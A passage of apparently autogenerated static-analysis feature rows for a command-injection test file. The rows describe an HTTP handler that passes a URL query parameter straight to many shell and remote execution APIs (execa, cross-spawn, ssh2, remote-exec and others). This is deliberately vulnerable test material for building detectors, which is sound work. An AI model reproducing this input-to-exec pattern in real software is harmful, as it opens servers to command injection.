foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:11:25:57 | SSH2Stream | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:11:25:57 | SSH2Stream | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:24:25:30 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:24:25:30 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:24:25:30 | require | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:24:25:30 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:24:25:30 | require | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:24:25:46 | exceptional return of require ... reams") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:24:25:46 | exceptional return of require ... reams") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:24:25:46 | exceptional return of require ... reams") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:24:25:46 | exceptional return of require ... reams") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:24:25:46 | exceptional return of require ... reams") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:24:25:46 | require ... reams") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:24:25:46 | require ... reams") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:24:25:46 | require ... reams") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:24:25:46 | require ... reams") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:24:25:46 | require ... reams") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:24:25:57 | require ... 2Stream | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:24:25:57 | require ... 2Stream | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:24:25:57 | require ... 2Stream | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:24:25:57 | require ... 2Stream | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:24:25:57 | require ... 2Stream | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:32:25:45 | "ssh2-streams" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:32:25:45 | "ssh2-streams" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:32:25:45 | "ssh2-streams" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:32:25:45 | "ssh2-streams" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:32:25:45 | "ssh2-streams" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:32:25:45 | "ssh2-streams" | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:32:25:45 | "ssh2-streams" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:32:25:45 | "ssh2-streams" | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:48:25:57 | SSH2Stream | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:48:25:57 | SSH2Stream | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:48:25:57 | SSH2Stream | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:48:25:57 | SSH2Stream | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:48:25:57 | SSH2Stream | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:5:26:20 | exceptional return of new SSH2Stream() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:5:26:20 | exceptional return of new SSH2Stream() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:5:26:20 | exceptional return of new SSH2Stream() | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:5:26:20 | exceptional return of new SSH2Stream() | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:5:26:20 | exceptional return of new SSH2Stream() | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:5:26:20 | new SSH2Stream() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:5:26:20 | new SSH2Stream() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:5:26:20 | new SSH2Stream() | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:5:26:20 | new SSH2Stream() | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:5:26:20 | new SSH2Stream() | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:5:26:25 | new SSH ... ().exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:5:26:25 | new SSH ... ().exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:5:26:25 | new SSH ... ().exec | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:5:26:25 | new SSH ... ().exec | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:5:26:25 | new SSH ... ().exec | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:5:26:37 | exceptional return of new SSH ... e, cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:5:26:37 | exceptional return of new SSH ... e, cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:5:26:37 | exceptional return of new SSH ... e, cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:5:26:37 | exceptional return of new SSH ... e, cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:5:26:37 | exceptional return of new SSH ... e, cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:5:26:37 | new SSH ... e, cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:5:26:37 | new SSH ... e, cmd) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:5:26:37 | new SSH ... e, cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:5:26:37 | new SSH ... e, cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:5:26:37 | new SSH ... e, cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:9:26:18 | SSH2Stream | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:9:26:18 | SSH2Stream | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:9:26:18 | SSH2Stream | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:9:26:18 | SSH2Stream | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:9:26:18 | SSH2Stream | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:22:26:25 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:22:26:25 | exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:22:26:25 | exec | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:22:26:25 | exec | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:22:26:25 | exec | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:27:26:31 | false | CalleeFlexibleAccessPath | SSH2Stream().exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:27:26:31 | false | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:27:26:31 | false | calleeImports | ssh2-streams | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:27:26:31 | false | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:27:26:31 | false | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:27:26:31 | false | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:27:26:31 | false | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:27:26:31 | false | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:34:26:36 | cmd | CalleeFlexibleAccessPath | SSH2Stream().exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:34:26:36 | cmd | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:34:26:36 | cmd | calleeImports | ssh2-streams | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:34:26:36 | cmd | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:34:26:36 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:34:26:36 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:34:26:36 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:34:26:36 | cmd | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:11 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:11 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:11 | require | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:11 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:11 | require | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:20 | exceptional return of require("execa") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:20 | exceptional return of require("execa") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:20 | exceptional return of require("execa") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:20 | exceptional return of require("execa") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:20 | exceptional return of require("execa") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:20 | require("execa") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:20 | require("execa") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:20 | require("execa") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:20 | require("execa") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:20 | require("execa") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:25 | require ... ").node | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:25 | require ... ").node | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:25 | require ... ").node | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:25 | require ... ").node | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:25 | require ... ").node | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:30 | exceptional return of require ... de(cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:30 | exceptional return of require ... de(cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:30 | exceptional return of require ... de(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:30 | exceptional return of require ... de(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:30 | exceptional return of require ... de(cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:30 | require ... de(cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:30 | require ... de(cmd) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:30 | require ... de(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:30 | require ... de(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:30 | require ... de(cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:13:28:19 | "execa" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:13:28:19 | "execa" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:13:28:19 | "execa" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:13:28:19 | "execa" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:13:28:19 | "execa" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:13:28:19 | "execa" | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:13:28:19 | "execa" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:13:28:19 | "execa" | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:22:28:25 | node | 